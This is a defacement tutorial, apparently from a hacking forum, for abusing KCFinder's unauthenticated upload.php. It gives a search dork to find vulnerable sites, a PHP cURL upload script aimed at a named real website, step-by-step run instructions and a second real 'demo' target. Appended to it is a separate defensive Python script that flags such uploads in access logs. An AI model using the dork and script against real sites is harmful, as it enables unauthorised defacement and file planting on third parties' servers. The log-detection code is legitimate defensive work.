Deface with KCFinder (dropping an image) :v

Defacing with KCFinder is pretty easy :D
Install XAMPP first + curl; all of it is on Google :v

####################################
Dork :
  • inurl:plugins/kcfinder/
#####################################

#####################################
Exploit :
  • KCFinder/upload.php
#####################################

Save this with a (.php) extension
example: aplod1.php

```php
<?php
// Local file to send (the page's gambar.png)
$uploadfile = "gambar.png";

// The KCFinder upload endpoint on the target site
$ch = curl_init("http://www.baron-design.com/gw-includes/plugins/KCFinder/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// Multipart POST; "@path" is the old PHP 5 cURL file-upload syntax
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('orange_themes' => "@$uploadfile"));
// Return the response body instead of printing it directly
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// KCFinder's reply contains the path where the file was stored
print "$postResult";
?>
```

Notes: gambar.png = the image we want to upload :D
http://www.baron-design.com/gw-includes/plugins/KCFinder/upload.php = your target :v
Save:
  • aplod1.php
  • gambar.png
in xampp/php :v
After that, open CMD,
e.g.: cd xampp, cd php, php aplod1.php
The output shows where our image ended up :v

On this site, our image is located at http://www.baron-design.com/gw-content/uploads/files/gambar.png :v
Hope this is useful :v

Demo site: http://ferrarimarketletter.com/fuel/modules/fuel/assets/js/editors/ckeditor/plugins/kcfinder/upload.php :v :v
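The request pattern this page describes (an unauthenticated multipart POST to kcfinder/upload.php, followed by a fetch of the dropped file from the uploads directory) is easy to spot in a web server's access log. The script below is an added example for this page, written from the defender's side; it is not code from the original post or from the KCFinder project. The log lines are constructed (RFC 5737 documentation addresses), and the function names, the `uploads_dir` default and the combined-log regex are assumptions about a typical Apache/nginx setup.

```python
import re
from dataclasses import dataclass

# Constructed sample access log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "POST /gw-includes/plugins/KCFinder/upload.php HTTP/1.1" 200 512 "-" "curl/7.29.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:10 +0000] "GET /gw-content/uploads/files/gambar.png HTTP/1.1" 200 4096 "-" "curl/7.29.0"
192.0.2.9 - - [10/Oct/2023:14:02:22 +0000] "POST /assets/js/ckeditor/plugins/kcfinder/upload.php HTTP/1.1" 403 0 "-" "python-requests/2.31"
"""

# Combined log format: ip ident user [time] "METHOD path proto" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The endpoint abused on this page: any path ending in kcfinder/upload.php, any casing.
UPLOAD_RE = re.compile(r'/kcfinder/upload\.php(\?.*)?$', re.IGNORECASE)


@dataclass
class Request:
    ip: str
    ts: str
    method: str
    path: str
    status: int
    ua: str


def parse_log(text):
    """Parse combined-format lines; lines that do not match are skipped."""
    reqs = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            reqs.append(Request(m['ip'], m['ts'], m['method'], m['path'],
                                int(m['status']), m['ua']))
    return reqs


def find_upload_attempts(reqs):
    """Every POST aimed at a KCFinder upload endpoint, whatever the server answered."""
    return [r for r in reqs if r.method == 'POST' and UPLOAD_RE.search(r.path)]


def successful_uploads(reqs):
    """Attempts the server accepted (2xx); these are the ones that need cleanup."""
    return [r for r in find_upload_attempts(reqs) if 200 <= r.status < 300]


def followup_fetches(reqs, uploads_dir='/uploads/'):
    """GETs under the uploads directory by an IP whose upload POST was accepted.

    This is the second half of the pattern: the uploader comes back for the file.
    uploads_dir is an assumed default; set it to the site's real upload path.
    """
    uploaders = {r.ip for r in successful_uploads(reqs)}
    return [r for r in reqs
            if r.method == 'GET' and r.ip in uploaders and uploads_dir in r.path]


def report(text):
    """Summarise what an analyst would want to see first."""
    reqs = parse_log(text)
    return {
        'attempts': len(find_upload_attempts(reqs)),
        'accepted': [(r.ip, r.path) for r in successful_uploads(reqs)],
        'dropped_files': [r.path for r in followup_fetches(reqs)],
    }


if __name__ == '__main__':
    for key, value in report(SAMPLE_LOG).items():
        print(f'{key}: {value}')
```

Run it against a real access log with `report(open('access.log').read())`. An accepted POST to a kcfinder upload endpoint with no prior authenticated session is the signal to act on; the fetched paths in `dropped_files` tell you what to remove, and the fix on the server side is to require authentication in KCFinder's config or to block the endpoint entirely if the editor is not in use.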
